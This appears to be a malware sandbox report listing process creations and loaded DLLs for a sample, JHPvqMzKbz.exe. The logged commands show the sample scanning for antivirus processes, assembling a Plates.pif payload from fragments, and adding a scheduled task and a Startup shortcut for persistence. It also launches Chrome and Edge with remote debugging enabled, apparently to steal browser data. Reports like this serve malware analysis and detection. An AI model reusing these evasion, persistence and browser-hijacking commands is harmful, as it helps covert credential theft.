Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & echo URL="C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Windows\SysWOW64\choice.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2712,i,6102219914844560487,8884076869800475828,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2720 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2592,14949538352353906560,7092886331907470317,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2888 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,7521359329139554661,14603226509212112048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8460 -s 2316
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2564,i,2928389766858636215,3856255721450826831,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2656 /prefetch:3
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2544,7093872642372184554,16351144755115149481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2544,7093872642372184554,16351144755115149481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6932 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 646751	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AffiliateRobotsJoinedNewsletter" Purse	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Suitable + ..\Johnson + ..\July + ..\Firmware + ..\Invalid + ..\Baby + ..\Bar + ..\Continental + ..\Ruled + ..\Gay + ..\Hop + ..\Clearance + ..\Wisdom + ..\January + ..\Denmark + ..\Bull c	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\646751\Plates.pif Plates.pif c	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & echo URL="C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2712,i,6102219914844560487,8884076869800475828,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2720 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2592,14949538352353906560,7092886331907470317,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2888 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,7521359329139554661,14603226509212112048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2564,i,2928389766858636215,3856255721450826831,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2656 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2544,7093872642372184554,16351144755115149481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2544,7093872642372184554,16351144755115149481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6932 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: wbemcomn.dll	Jump to behavior
